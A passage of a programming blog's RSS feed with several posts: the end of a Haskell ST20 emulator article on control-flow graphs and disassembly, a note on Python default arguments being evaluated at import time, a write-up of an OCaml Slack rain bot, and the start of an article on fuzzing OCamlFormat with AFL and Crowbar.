<span id="cb42-24"><a href="#cb42-24" aria-hidden="true" tabindex="-1"></a>            extraPins <span class="dt">T00</span> <span class="ot">=</span> [((iPin <span class="dv">0</span>, <span class="dt">InHandle</span> stdin), (oPin <span class="dv">0</span>, <span class="dt">OutHandle</span> stdout))]</span>
<span id="cb42-25"><a href="#cb42-25" aria-hidden="true" tabindex="-1"></a>            extraPins _ <span class="ot">=</span> []</span></code></pre></div>
<h2 id="bonus-static-analysis-tools">Bonus: static analysis tools</h2>
<p>The above <code>transputer</code> function is controlled by the following configuration:</p>
<div class="sourceCode" id="cb43"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb43-1"><a href="#cb43-1" aria-hidden="true" tabindex="-1"></a><span class="kw">data</span> <span class="dt">Analysis</span> <span class="ot">=</span> <span class="dt">Graph</span> <span class="op">|</span> <span class="dt">Disasm</span></span>
<span id="cb43-2"><a href="#cb43-2" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb43-3"><a href="#cb43-3" aria-hidden="true" tabindex="-1"></a><span class="ot">isDebug ::</span> <span class="dt">TransputerName</span> <span class="ot">-&gt;</span> <span class="dt">Maybe</span> <span class="dt">Analysis</span></span>
<span id="cb43-4"><a href="#cb43-4" aria-hidden="true" tabindex="-1"></a>isDebug _ <span class="ot">=</span> <span class="dt">Nothing</span></span></code></pre></div>
<p>It means that for each transputer, we can choose to print a graph or a
disassembly of the code that will be executed. To do that, we will first compute
the set of all edges in the control flow graph.</p>
<p>This analysis relies on a <code>nextInstr</code> function that statically computes the set
of next instructions. These can be reached either because it’s the next
one in the instruction flow (<code>DSeq</code>), because of jump (<code>DJmp</code>), or an unknown
destination, for example after a <code>RET</code> (<code>DDyn</code>).</p>
<div class="sourceCode" id="cb44"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb44-1"><a href="#cb44-1" aria-hidden="true" tabindex="-1"></a><span class="kw">data</span> <span class="dt">Dest</span> <span class="ot">=</span> <span class="dt">DSeq</span> <span class="dt">Address</span></span>
<span id="cb44-2"><a href="#cb44-2" aria-hidden="true" tabindex="-1"></a>          <span class="op">|</span> <span class="dt">DJmp</span> <span class="dt">Address</span></span>
<span id="cb44-3"><a href="#cb44-3" aria-hidden="true" tabindex="-1"></a>          <span class="op">|</span> <span class="dt">DDyn</span></span>
<span id="cb44-4"><a href="#cb44-4" aria-hidden="true" tabindex="-1"></a>    <span class="kw">deriving</span> (<span class="dt">Eq</span>, <span class="dt">Ord</span>)</span>
<span id="cb44-5"><a href="#cb44-5" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb44-6"><a href="#cb44-6" aria-hidden="true" tabindex="-1"></a><span class="ot">nextInstrs ::</span> <span class="dt">Instr</span> <span class="ot">-&gt;</span> [<span class="dt">Dest</span>]</span>
<span id="cb44-7"><a href="#cb44-7" aria-hidden="true" tabindex="-1"></a>nextInstrs (<span class="dt">Pri</span> <span class="dt">CJ</span> n) <span class="ot">=</span> [<span class="dt">DSeq</span> <span class="dv">0</span>, <span class="dt">DJmp</span> n]</span>
<span id="cb44-8"><a href="#cb44-8" aria-hidden="true" tabindex="-1"></a>nextInstrs (<span class="dt">Pri</span> <span class="dt">J</span> n) <span class="ot">=</span> [<span class="dt">DJmp</span> n]</span>
<span id="cb44-9"><a href="#cb44-9" aria-hidden="true" tabindex="-1"></a>nextInstrs (<span class="dt">Pri</span> <span class="dt">CALL</span> n) <span class="ot">=</span> [<span class="dt">DSeq</span> <span class="dv">0</span>, <span class="dt">DJmp</span> n]</span>
<span id="cb44-10"><a href="#cb44-10" aria-hidden="true" tabindex="-1"></a>nextInstrs (<span class="dt">Sec</span> <span class="dt">GCALL</span>) <span class="ot">=</span> [<span class="dt">DDyn</span>]</span>
<span id="cb44-11"><a href="#cb44-11" aria-hidden="true" tabindex="-1"></a>nextInstrs (<span class="dt">Sec</span> <span class="dt">RET</span>) <span class="ot">=</span> [<span class="dt">DDyn</span>]</span>
<span id="cb44-12"><a href="#cb44-12" aria-hidden="true" tabindex="-1"></a>nextInstrs _ <span class="ot">=</span> [<span class="dt">DSeq</span> <span class="dv">0</span>]</span></code></pre></div>
<p>We can wrap this function in a monadic one that can turn these relative
addresses into absolute ones (since it can know the addresses of functions).</p>
<div class="sourceCode" id="cb45"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb45-1"><a href="#cb45-1" aria-hidden="true" tabindex="-1"></a><span class="kw">type</span> <span class="dt">EdgeSet</span> <span class="ot">=</span> <span class="dt">S.Set</span> (<span class="dt">Address</span>, <span class="dt">Instr</span>, <span class="dt">Dest</span>)</span>
<span id="cb45-2"><a href="#cb45-2" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb45-3"><a href="#cb45-3" aria-hidden="true" tabindex="-1"></a><span class="ot">instrDests ::</span> <span class="dt">Address</span> <span class="ot">-&gt;</span> <span class="dt">Eval</span> <span class="dt">EdgeSet</span></span>
<span id="cb45-4"><a href="#cb45-4" aria-hidden="true" tabindex="-1"></a>instrDests start <span class="ot">=</span> <span class="kw">do</span></span>
<span id="cb45-5"><a href="#cb45-5" aria-hidden="true" tabindex="-1"></a>    iptr <span class="op">.=</span> start</span>
<span id="cb45-6"><a href="#cb45-6" aria-hidden="true" tabindex="-1"></a>    i <span class="ot">&lt;-</span> decodeInstr</span>
<span id="cb45-7"><a href="#cb45-7" aria-hidden="true" tabindex="-1"></a>    <span class="kw">let</span> deltaips <span class="ot">=</span> nextInstrs i</span>
<span id="cb45-8"><a href="#cb45-8" aria-hidden="true" tabindex="-1"></a>    new <span class="ot">&lt;-</span> use iptr</span>
<span id="cb45-9"><a href="#cb45-9" aria-hidden="true" tabindex="-1"></a>    <span class="fu">return</span> <span class="op">$</span> S.fromList <span class="op">$</span> <span class="fu">map</span> (\ d <span class="ot">-&gt;</span> (start, i, adjust new d)) deltaips</span>
<span id="cb45-10"><a href="#cb45-10" aria-hidden="true" tabindex="-1"></a>        <span class="kw">where</span></span>
<span id="cb45-11"><a href="#cb45-11" aria-hidden="true" tabindex="-1"></a>            adjust n (<span class="dt">DSeq</span> d) <span class="ot">=</span> <span class="dt">DSeq</span> <span class="op">$</span> n <span class="op">+</span> d</span>
<span id="cb45-12"><a href="#cb45-12" aria-hidden="true" tabindex="-1"></a>            adjust n (<span class="dt">DJmp</span> d) <span class="ot">=</span> <span class="dt">DJmp</span> <span class="op">$</span> n <span class="op">+</span> d</span>
<span id="cb45-13"><a href="#cb45-13" aria-hidden="true" tabindex="-1"></a>            adjust _ <span class="dt">DDyn</span> <span class="ot">=</span> <span class="dt">DDyn</span></span></code></pre></div>
<p>Then, the algorithm consists in computing the fixpoint of the following
iterating function:</p>
<div class="sourceCode" id="cb46"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb46-1"><a href="#cb46-1" aria-hidden="true" tabindex="-1"></a><span class="ot">step ::</span> <span class="dt">EdgeSet</span> <span class="ot">-&gt;</span> <span class="dt">Eval</span> <span class="dt">EdgeSet</span></span>
<span id="cb46-2"><a href="#cb46-2" aria-hidden="true" tabindex="-1"></a>step s <span class="ot">=</span> <span class="kw">do</span></span>
<span id="cb46-3"><a href="#cb46-3" aria-hidden="true" tabindex="-1"></a>    xs <span class="ot">&lt;-</span> <span class="fu">mapM</span> (basicBlockM <span class="op">.</span> getDest) <span class="op">$</span> S.toList s</span>
<span id="cb46-4"><a href="#cb46-4" aria-hidden="true" tabindex="-1"></a>    <span class="fu">return</span> <span class="op">$</span> S.union s <span class="op">$</span> S.unions xs</span>
<span id="cb46-5"><a href="#cb46-5" aria-hidden="true" tabindex="-1"></a>        <span class="kw">where</span></span>
<span id="cb46-6"><a href="#cb46-6" aria-hidden="true" tabindex="-1"></a>            getDest (_, _, <span class="dt">DSeq</span> a) <span class="ot">=</span> <span class="dt">Just</span> a</span>
<span id="cb46-7"><a href="#cb46-7" aria-hidden="true" tabindex="-1"></a>            getDest (_, _, <span class="dt">DJmp</span> a) <span class="ot">=</span> <span class="dt">Just</span> a</span>
<span id="cb46-8"><a href="#cb46-8" aria-hidden="true" tabindex="-1"></a>            getDest (_, _, <span class="dt">DDyn</span>) <span class="ot">=</span> <span class="dt">Nothing</span></span>
<span id="cb46-9"><a href="#cb46-9" aria-hidden="true" tabindex="-1"></a>            basicBlockM (<span class="dt">Just</span> a) <span class="ot">=</span> instrDests a</span>
<span id="cb46-10"><a href="#cb46-10" aria-hidden="true" tabindex="-1"></a>            basicBlockM <span class="dt">Nothing</span> <span class="ot">=</span> <span class="fu">return</span> S.empty</span></code></pre></div>
<p>The fixpoint itself is computed using the following function, which takes a
predicate on two <code>EdgeSet</code>s to stop the iteration.</p>
<div class="sourceCode" id="cb47"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb47-1"><a href="#cb47-1" aria-hidden="true" tabindex="-1"></a><span class="ot">stepUntil ::</span> ((<span class="dt">EdgeSet</span>, <span class="dt">EdgeSet</span>) <span class="ot">-&gt;</span> <span class="dt">Bool</span>) <span class="ot">-&gt;</span> (<span class="dt">EdgeSet</span>, <span class="dt">EdgeSet</span>) <span class="ot">-&gt;</span> <span class="dt">Eval</span> <span class="dt">EdgeSet</span></span>
<span id="cb47-2"><a href="#cb47-2" aria-hidden="true" tabindex="-1"></a>stepUntil p (a, b) <span class="op">|</span> p (a, b) <span class="ot">=</span> <span class="fu">return</span> b</span>
<span id="cb47-3"><a href="#cb47-3" aria-hidden="true" tabindex="-1"></a>stepUntil p (_, b) <span class="ot">=</span> <span class="kw">do</span></span>
<span id="cb47-4"><a href="#cb47-4" aria-hidden="true" tabindex="-1"></a>    c <span class="ot">&lt;-</span> step b</span>
<span id="cb47-5"><a href="#cb47-5" aria-hidden="true" tabindex="-1"></a>    stepUntil p (b, c)</span></code></pre></div>
<p>We’ll stop when their size is equal.</p>
<div class="sourceCode" id="cb48"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb48-1"><a href="#cb48-1" aria-hidden="true" tabindex="-1"></a><span class="ot">runAnalysis ::</span> <span class="dt">Maybe</span> <span class="dt">Analysis</span> <span class="ot">-&gt;</span> <span class="dt">Eval</span> ()</span>
<span id="cb48-2"><a href="#cb48-2" aria-hidden="true" tabindex="-1"></a>runAnalysis <span class="dt">Nothing</span> <span class="ot">=</span> <span class="fu">return</span> ()</span>
<span id="cb48-3"><a href="#cb48-3" aria-hidden="true" tabindex="-1"></a>runAnalysis (<span class="dt">Just</span> analysis) <span class="ot">=</span> <span class="kw">do</span></span>
<span id="cb48-4"><a href="#cb48-4" aria-hidden="true" tabindex="-1"></a>    s0 <span class="ot">&lt;-</span> instrDests memStart</span>
<span id="cb48-5"><a href="#cb48-5" aria-hidden="true" tabindex="-1"></a>    <span class="kw">let</span> p (a, b) <span class="ot">=</span> S.size a <span class="op">==</span> S.size b</span>
<span id="cb48-6"><a href="#cb48-6" aria-hidden="true" tabindex="-1"></a>    r <span class="ot">&lt;-</span> stepUntil p (S.empty, s0)</span>
<span id="cb48-7"><a href="#cb48-7" aria-hidden="true" tabindex="-1"></a>    liftIO <span class="op">$</span> <span class="fu">putStrLn</span> <span class="op">$</span> convert analysis r</span>
<span id="cb48-8"><a href="#cb48-8" aria-hidden="true" tabindex="-1"></a>    iptr <span class="op">.=</span> memStart</span></code></pre></div>
<p>Finally, here is how to convert the <code>EdgeSet</code>s in a human-readable form.</p>
<div class="sourceCode" id="cb49"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb49-1"><a href="#cb49-1" aria-hidden="true" tabindex="-1"></a><span class="ot">convert ::</span> <span class="dt">Analysis</span> <span class="ot">-&gt;</span> <span class="dt">EdgeSet</span> <span class="ot">-&gt;</span> <span class="dt">String</span></span>
<span id="cb49-2"><a href="#cb49-2" aria-hidden="true" tabindex="-1"></a>convert <span class="dt">Graph</span> es <span class="ot">=</span></span>
<span id="cb49-3"><a href="#cb49-3" aria-hidden="true" tabindex="-1"></a>    <span class="st">&quot;digraph G{\n&quot;</span></span>
<span id="cb49-4"><a href="#cb49-4" aria-hidden="true" tabindex="-1"></a>    <span class="op">++</span> <span class="st">&quot;node[shape=point]\n&quot;</span></span>
<span id="cb49-5"><a href="#cb49-5" aria-hidden="true" tabindex="-1"></a>    <span class="op">++</span> <span class="fu">concatMap</span> edge (S.toList es)</span>
<span id="cb49-6"><a href="#cb49-6" aria-hidden="true" tabindex="-1"></a>    <span class="op">++</span> <span class="st">&quot;}&quot;</span></span>
<span id="cb49-7"><a href="#cb49-7" aria-hidden="true" tabindex="-1"></a>        <span class="kw">where</span></span>
<span id="cb49-8"><a href="#cb49-8" aria-hidden="true" tabindex="-1"></a>            edge (x, i, y) <span class="ot">=</span> <span class="fu">show</span> x <span class="op">++</span> <span class="st">&quot; -&gt; &quot;</span> <span class="op">++</span> toNode x y <span class="op">++</span> <span class="st">&quot;[label=\&quot;&quot;</span> <span class="op">++</span> <span class="fu">show</span> i <span class="op">++</span> <span class="st">&quot;\&quot;];\n&quot;</span></span>
<span id="cb49-9"><a href="#cb49-9" aria-hidden="true" tabindex="-1"></a>            toNode _ (<span class="dt">DSeq</span> a) <span class="ot">=</span> <span class="fu">show</span> a</span>
<span id="cb49-10"><a href="#cb49-10" aria-hidden="true" tabindex="-1"></a>            toNode _ (<span class="dt">DJmp</span> a) <span class="ot">=</span> <span class="fu">show</span> a</span>
<span id="cb49-11"><a href="#cb49-11" aria-hidden="true" tabindex="-1"></a>            toNode x <span class="dt">DDyn</span> <span class="ot">=</span> <span class="st">&quot;dyn&quot;</span> <span class="op">++</span> <span class="fu">show</span> x</span>
<span id="cb49-12"><a href="#cb49-12" aria-hidden="true" tabindex="-1"></a>convert <span class="dt">Disasm</span> es <span class="ot">=</span> <span class="fu">concatMap</span> go <span class="op">$</span> S.toList es</span>
<span id="cb49-13"><a href="#cb49-13" aria-hidden="true" tabindex="-1"></a>    <span class="kw">where</span></span>
<span id="cb49-14"><a href="#cb49-14" aria-hidden="true" tabindex="-1"></a>        go (x, i, <span class="dt">DSeq</span> _) <span class="ot">=</span></span>
<span id="cb49-15"><a href="#cb49-15" aria-hidden="true" tabindex="-1"></a>            printf <span class="st">&quot;%04x %s\n&quot;</span> x (<span class="fu">show</span> i)</span>
<span id="cb49-16"><a href="#cb49-16" aria-hidden="true" tabindex="-1"></a>        go (x, i, <span class="dt">DJmp</span> y) <span class="ot">=</span></span>
<span id="cb49-17"><a href="#cb49-17" aria-hidden="true" tabindex="-1"></a>            printf <span class="st">&quot;%04x %s  [* %04x]\n&quot;</span> x (<span class="fu">show</span> i) y</span>
<span id="cb49-18"><a href="#cb49-18" aria-hidden="true" tabindex="-1"></a>        go (x, i, <span class="dt">DDyn</span>) <span class="ot">=</span></span>
<span id="cb49-19"><a href="#cb49-19" aria-hidden="true" tabindex="-1"></a>            printf <span class="st">&quot;%04x %s  [* dyn]\n&quot;</span> x (<span class="fu">show</span> i)</span></code></pre></div>
<p>For example here is an extract of the beginning of the first transputer. You can
notice instructions with several destinations (conditional jumps) are displayed
twice.</p>
<pre><code>80000100 AJW -76
80000102 LDC 0
80000103 STL 1
80000104 LDC 0
80000105 STL 3
80000106 MINT
80000108 LDNLP 1024
8000010b GAJW
8000010d AJW -76
8000010f LDC 201
80000111 LDPI
80000113 MINT
80000115 LDC 8
80000116 OUT
80000117 LDLP 73
80000119 MINT
8000011b LDNLP 4
8000011c LDC 12
8000011d IN
8000011e LDL 73
80000120 CJ 21
80000120 CJ 21  [* 80000137]
80000122 LDC 205
80000124 LDPI</code></pre>
<p>For the graph output, I assume that you have already seen graphviz output:</p>
<figure>
<img src="/img/st20/t03.png" alt="T03 with dot driver" />
<figcaption aria-hidden="true">T03 with dot driver</figcaption>
</figure>
<p>The introduction image was done using the same output but an alternative layout
engines.</p>
<p>Hope you enjoyed this article!</p>]]></description>
    <pubDate>Thu, 20 Aug 2015 00:00:00 UT</pubDate>
    <guid>http://blog.emillon.org/posts/2015-08-20-a-lens-based-st20-emulator.html</guid>
    <dc:creator>Etienne Millon</dc:creator>
</item>
<item>
    <title>In Python, default values are evaluated at import time</title>
    <link>http://blog.emillon.org/posts/2016-01-12-in-python-default-values-are-evaluated-at-import-time.html</link>
    <description><![CDATA[<p>This is a minimal example reproducing <a href="https://github.com/Alir3z4/html2text/pull/84">a bug I found in
html2text</a>. Suppose we have
configuration module, a library that uses the configuration, and a main
function.</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode python"><code class="sourceCode python"><span id="cb1-1"><a href="#cb1-1" aria-hidden="true" tabindex="-1"></a><span class="co"># config.py</span></span>
<span id="cb1-2"><a href="#cb1-2" aria-hidden="true" tabindex="-1"></a>default <span class="op">=</span> <span class="va">False</span></span>
<span id="cb1-3"><a href="#cb1-3" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb1-4"><a href="#cb1-4" aria-hidden="true" tabindex="-1"></a><span class="co"># lib.py</span></span>
<span id="cb1-5"><a href="#cb1-5" aria-hidden="true" tabindex="-1"></a><span class="im">import</span> config</span>
<span id="cb1-6"><a href="#cb1-6" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb1-7"><a href="#cb1-7" aria-hidden="true" tabindex="-1"></a><span class="kw">def</span> f(x<span class="op">=</span>config.default):</span>
<span id="cb1-8"><a href="#cb1-8" aria-hidden="true" tabindex="-1"></a>    <span class="bu">print</span> x</span>
<span id="cb1-9"><a href="#cb1-9" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb1-10"><a href="#cb1-10" aria-hidden="true" tabindex="-1"></a><span class="co"># main.py</span></span>
<span id="cb1-11"><a href="#cb1-11" aria-hidden="true" tabindex="-1"></a><span class="im">import</span> config</span>
<span id="cb1-12"><a href="#cb1-12" aria-hidden="true" tabindex="-1"></a><span class="im">import</span> lib</span>
<span id="cb1-13"><a href="#cb1-13" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb1-14"><a href="#cb1-14" aria-hidden="true" tabindex="-1"></a>config.default <span class="op">=</span> <span class="va">True</span></span>
<span id="cb1-15"><a href="#cb1-15" aria-hidden="true" tabindex="-1"></a>lib.f()</span></code></pre></div>
<p>The main function sets the configuration, then calls <code>f</code>.
One would expect that the program prints <code>True</code>…
but it actually prints <code>False</code>.</p>
<p>This behavior can be surprising, but it is perfectly logical once you know the
rule:</p>
<p><strong>In Python, default values are evaluated at import time.</strong></p>
<p>This is all there is to know about this problem.
Here is what happens at runtime in the above example:</p>
<ul>
<li>The main program first imports <code>config</code>.
The definition of <code>default</code> is evaluated and its value is <code>False</code>.</li>
<li><code>lib</code> is imported, and the definition of <code>lib.f</code> is evaluated.
The value of this function includes the default value for <code>x</code>.
So, the definition of this default value, <code>config.default</code>, is evaluated and
it is <code>False</code>.</li>
<li>When the value <code>True</code> is assigned to <code>config.default</code>, it is too late:
the value <code>False</code> is already part of the function’s value.</li>
</ul>
<p>That last part is not only a metaphor, the default value is actually part of the
function object:</p>
<div class="sourceCode" id="cb2"><pre class="sourceCode python"><code class="sourceCode python"><span id="cb2-1"><a href="#cb2-1" aria-hidden="true" tabindex="-1"></a><span class="op">&gt;&gt;&gt;</span> <span class="kw">def</span> f(x<span class="op">=</span><span class="dv">3</span>):</span>
<span id="cb2-2"><a href="#cb2-2" aria-hidden="true" tabindex="-1"></a>...     <span class="bu">print</span> x</span>
<span id="cb2-3"><a href="#cb2-3" aria-hidden="true" tabindex="-1"></a>...</span>
<span id="cb2-4"><a href="#cb2-4" aria-hidden="true" tabindex="-1"></a><span class="op">&gt;&gt;&gt;</span> f.func_defaults</span>
<span id="cb2-5"><a href="#cb2-5" aria-hidden="true" tabindex="-1"></a>(<span class="dv">3</span>,)</span></code></pre></div>
<p>In order to avoid this caveat, the usual solution is to use <code>None</code> for default
values:</p>
<div class="sourceCode" id="cb3"><pre class="sourceCode python"><code class="sourceCode python"><span id="cb3-1"><a href="#cb3-1" aria-hidden="true" tabindex="-1"></a><span class="kw">def</span> f(x<span class="op">=</span><span class="va">None</span>):</span>
<span id="cb3-2"><a href="#cb3-2" aria-hidden="true" tabindex="-1"></a>    <span class="cf">if</span> x <span class="kw">is</span> <span class="va">None</span>:</span>
<span id="cb3-3"><a href="#cb3-3" aria-hidden="true" tabindex="-1"></a>        x <span class="op">=</span> config.default</span>
<span id="cb3-4"><a href="#cb3-4" aria-hidden="true" tabindex="-1"></a>    <span class="bu">print</span> x</span></code></pre></div>
<p>That way, the evaluation of <code>config.default</code> will happen at runtime, which is
what we want here. The above program will indeed print <code>True</code>.</p>]]></description>
    <pubDate>Tue, 12 Jan 2016 00:00:00 UT</pubDate>
    <guid>http://blog.emillon.org/posts/2016-01-12-in-python-default-values-are-evaluated-at-import-time.html</guid>
    <dc:creator>Etienne Millon</dc:creator>
</item>
<item>
    <title>NaBoMaMo 2016 writeup</title>
    <link>http://blog.emillon.org/posts/2017-02-01-nabomamo-2016-writeup.html</link>
    <description><![CDATA[<p>Hello! It’s 2016, it’s November, and apparently it rhymes with <a href="http://nabomamo.botally.net/">#NaBoMaMo</a> 2016,
the National Bot Making Month. <a href="https://github.com/emillon/rain-bot">I made a bot!</a>.</p>
<p><em>Full disclosure:</em> it’s actually 2017, but I started writing this in 2016 so
it’s OK. Also I’m not actually from the US, but I’ll relax the definition a bit
and let’s pretend it means International Bot Making Year. Close enough!</p>
<p>Bots are all the rage - Twitter bots, IRC bots, Telegram bots… I decided to
make a Slack bot to get more familiar with that API.</p>
<p>I wanted this to be a small project - write and forget, basically. I started by
defining some specs and lock those down:</p>
<ul>
<li>that bot works on Slack</li>
<li>it uses the “will it rain in the next hour” API from Météo France.</li>
<li>the bot understands 3 commands:
<ul>
<li>tell you whether it will rain or not.</li>
<li>show you a graph of rain level over the next hour.</li>
<li>tell you when to go out to avoid the rain.</li>
</ul></li>
</ul>
<p>The next step was choosing the tech stack. For hosting itself I was sold on
using Heroku from previous projects (or another PaaS host, for what it’s worth)</p>
<p>As for the programming language itself, I hesitated between three choices:</p>
<ol type="1">
<li>focus on the all-included experience: something that has libraries, tooling,
but somehow boring;</li>
<li>focus on the shipping experience: stuff that I use daily, but looking to get
something online quickly;</li>
<li>focus on learning something new.</li>
</ol>
<p>The first one means something like Python or Ruby. I am familiar with the
languages and am pretty sure that there are libraries that can take care of the
Slack API without me having to ever worry about HTTP endpoints. That means also
first-class deployment and hosting.</p>
<p>The second one is about OCaml: it’s a programming language I use daily at work,
but the real goal would be to focus on shipping: create a project, write tests,
write implementation, deploy, repeat for new features, forget.</p>
<p>The third one means a totally new programming language. I heard a lot of good
things about Elixir for backend applications and figured that it would be a good
intro project. Learning a new language is always an interesting experience,
because it makes you a better programmer in all languages, and having clear
specs would make this manageable.</p>
<p>The Python/Ruby solution seemed a bit boring. I probably would not learn a lot,
only, maybe add a couple libraries to my toolbelt at most.</p>
<p>Elixir sounds great, but learning a new language and a new project at the same
time is too hard and too time consuming. I would rather write in a new language
something I previously wrote in another language. Though for something small and
focused like this, that could have worked.</p>
<p>I first created the project structure: github repo, ocaml project (topkg, opam,
etc). I like to use TDD for this kind of projects, so I added a small <a href="https://github.com/mirage/alcotest">alcotest</a>
suite. I also created the 12factor separation: a <code>Procfile</code>, a small <code>bin/</code>
shell that reads the application configuration from the environment and starts a
bot from <code>lib/</code>.</p>
<p>I asked myself what to test: the <a href="https://github.com/mirage/ocaml-cohttp">cohttp</a> library is nice, because servers and
clients are built using normal functions that take a request and returns a
response. That makes it possible to test almost everything at the ocaml level
without having to go to the HTTP level. This is especially important since there
is no way to mock values and functions in ocaml. Everything has to be real
objects.</p>
<p>However, even if it was possible to test everything, I decided to just focus on
the domain logic without testing the HTTP part: for example, I would pass data
structures directly to my bot object rather than building a cohttp request.</p>
<p>A part that is important for me even for a small project like that, is to have
some sort of CI: have travis run my test suite, and make a binary ready to be
deployed to Heroku. That way, it is impossible to forget how to make changes,
test and deploy, since this is all in a script.</p>
<p>The other part that needed work is the actual Slack integration. The “slash”
command API is pretty simple: it is possible to configure a Slack team such that
typing <code>/rain</code> will hit a particular URL. Some options are passed as <code>POST</code> data
and whatever is returned is displayed in Slack.</p>
<p>I set up the Slack integration, wrote a function to distinguish between
<code>/rain</code> and <code>/rain list</code> (using the POST data), and by the end of the second
iteraton I had my second feature implemented, working, and deployed.</p>
<p>All in all, that was pretty great. The code or the bot itself are not
particularly fantastic, but I learned some important lessons:</p>
<ul>
<li>When you do not want to spend a lot of time on a task, invest in planning and
keep the list of features short. That is pretty obvious in the context of paid
work, but this is applies well to hobby programming too.</li>
<li>Know what to test and what not to. Tests are useful to ensure that changes can
be made without breaking everything, but testing that your HTTP library can
parse POST data is a waste of time.</li>
<li>In languages where it is not possible to mock or monkey patch functions,
dependency injection is still possible. One may even argue that it leads to
a better solution, since it removes the coupling between the different
components.</li>
</ul>
<p>You can find <a href="https://github.com/emillon/rain-bot">the source of this bot on Github</a>.
See you next year, <a href="http://nabomamo.botally.net/">#NaBoMaMo</a>!
And thanks to Tully Hansen for organizing this.</p>]]></description>
    <pubDate>Wed, 01 Feb 2017 00:00:00 UT</pubDate>
    <guid>http://blog.emillon.org/posts/2017-02-01-nabomamo-2016-writeup.html</guid>
    <dc:creator>Etienne Millon</dc:creator>
</item>
<item>
    <title>Fuzzing OCamlFormat with AFL and Crowbar</title>
    <link>http://blog.emillon.org/posts/2020-08-03-fuzzing-ocamlformat-with-afl-and-crowbar.html</link>
    <description><![CDATA[<p><em>This article has been first published on the <a href="https://tarides.com/blog/2020-08-03-fuzzing-ocamlformat-with-afl-and-crowbar/">Tarides blog</a>.</em></p>
<p><a href="https://lcamtuf.coredump.cx/afl/">AFL</a> (and fuzzing in general) is often used
to find bugs in low-level code like parsers, but it also works very well to find
bugs in high level code, provided the right ingredients. We applied this
technique to feed random programs to OCamlFormat and found many formatting bugs.</p>
<p>OCamlFormat is a tool to format source code. To do so, it parses the source code
to an Abstract Syntax Tree (AST) and then applies formatting rules to the AST.</p>
<p>It can be tricky to correctly format the output. For example, say we want to
format <code>(a+b)*c</code>. The corresponding AST will look like <code>Apply("*", Apply ("+", Var "a", Var "b"), Var "c")</code>. A naive formatter would look like this:</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode ocaml"><code class="sourceCode ocaml"><span id="cb1-1"><a href="#cb1-1" aria-hidden="true" tabindex="-1"></a><span class="kw">let</span> <span class="kw">rec</span> <span class="dt">format</span> = <span class="kw">function</span></span>
<span id="cb1-2"><a href="#cb1-2" aria-hidden="true" tabindex="-1"></a>  | Var s -&gt; s</span>
<span id="cb1-3"><a href="#cb1-3" aria-hidden="true" tabindex="-1"></a>  | Apply (op, e1, e2) -&gt;</span>
<span id="cb1-4"><a href="#cb1-4" aria-hidden="true" tabindex="-1"></a>      <span class="dt">Printf</span>.sprintf <span class="st">&quot;%s %s %s&quot;</span> (<span class="dt">format</span> e1) op (<span class="dt">format</span> e2)</span></code></pre></div>
<p>But this is not correct, as it will print <code>(a+b)*c</code> as <code>a+b*c</code>, which is a
different program. In this particular case, the common solution would be to
track the relative precedence of the expressions and to emit only necessary
parentheses.</p>
<p>OCamlFormat has similar cases. To make sure we do not change a program when
formatting it, there is an extra check at the end to parse the output and
compare the output AST with the input AST. This ensures that, in case of bugs,
OCamlFormat exits with an error rather than changing the meaning of the input
program.</p>
<p>When we consider the whole OCaml language, the rules are complex and it is
difficult to make sure that we are correctly handling all programs. There are
two main failure modes: either we put too many parentheses, and the program does
not look good, or we do not put enough, and the AST changes (and OCamlFormat
exits with an error). We need a way to make sure that the latter does not
happen. Tests work to some extent, but some edge cases happen only when a
certain combination of language features is used. Because of this combinatorial
explosion, it is impossible to get good coverage using tests only.</p>
<p>Fortunately there is a technique we can use to automatically explore the program
space: fuzzing. For a primer on using this technique on OCaml programs, one can
refer to <a href="https://tarides.com/blog/2019-09-04-an-introduction-to-fuzzing-ocaml-with-afl-crowbar-and-bun">this article</a>.</p>
<p>To make this work we need two elements: a random program generator, and a
property to check. Here, we are interested in programs that are valid (in the
sense that they parse correctly) but do not format correctly. We can use the
OCamlFormat internals to do the following:</p>
<ol type="1">
<li>try to parse input: in case of a parse error, just reject this input as
invalid.</li>
<li>otherwise, with have a valid program. try to format it. If this happens with
no error at all, reject this input as well.</li>
<li>otherwise, it means that the AST changed, comments moved, or something
similar, in a valid program. This is what we are after.</li>
</ol>
<p>Generating random programs is a bit more difficult. We can feed random strings
to AFL, but even with a corpus of existing valid code it will generate many
invalid programs. We are not interested in these for this project, we would
rather start from valid programs.</p>
<p>A good way to do that is to use Crowbar to directly generate AST values. Thanks
to <a href="https://github.com/yomimono/ppx_deriving_crowbar"><code>ppx_deriving_crowbar</code></a> and <a href="https://github.com/ocaml-ppx/ppx_import"><code>ppx_import</code></a>
it is possible to generate random values for an external type like
<code>Parsetree.structure</code> (the contents of <code>.ml</code> files). Even more fortunately
<a href="https://github.com/yomimono/ocaml-test-omp/blob/d086037027537ba4e23ce027766187979c85aa3d/test/parsetree_405.ml">somebody already did the work</a>. Thanks, Mindy!</p>
<p>This approach works really well: it generates 5k-10k programs per second, which
is very good performance (AFL starts complaining below 100/s).</p>
<p>Quickly, AFL was able to find crashes related to attributes. These are “labels”
attached to various nodes of the AST. For example the expression <code>(x || y) [@a]</code>
(logical or between <code>x</code> and <code>y</code>, attach attribute <code>a</code> to the “or” expression)
would get formatted as <code>x || y [@a]</code> (attribute <code>a</code> is attached to the <code>y</code>
variable). Once again, there is a check in place in OCamlFormat to make sure
that it does not save the file in this case, but it would exit with an error.</p>
<p>After the fuzzer has run for a bit longer, it found crashes where comments would
jump around in expressions like <code>f (*a*) (*bb*) x</code>. Wait, what? We never told
the program generator how to generate comments. Inspecting the intermediate AST,
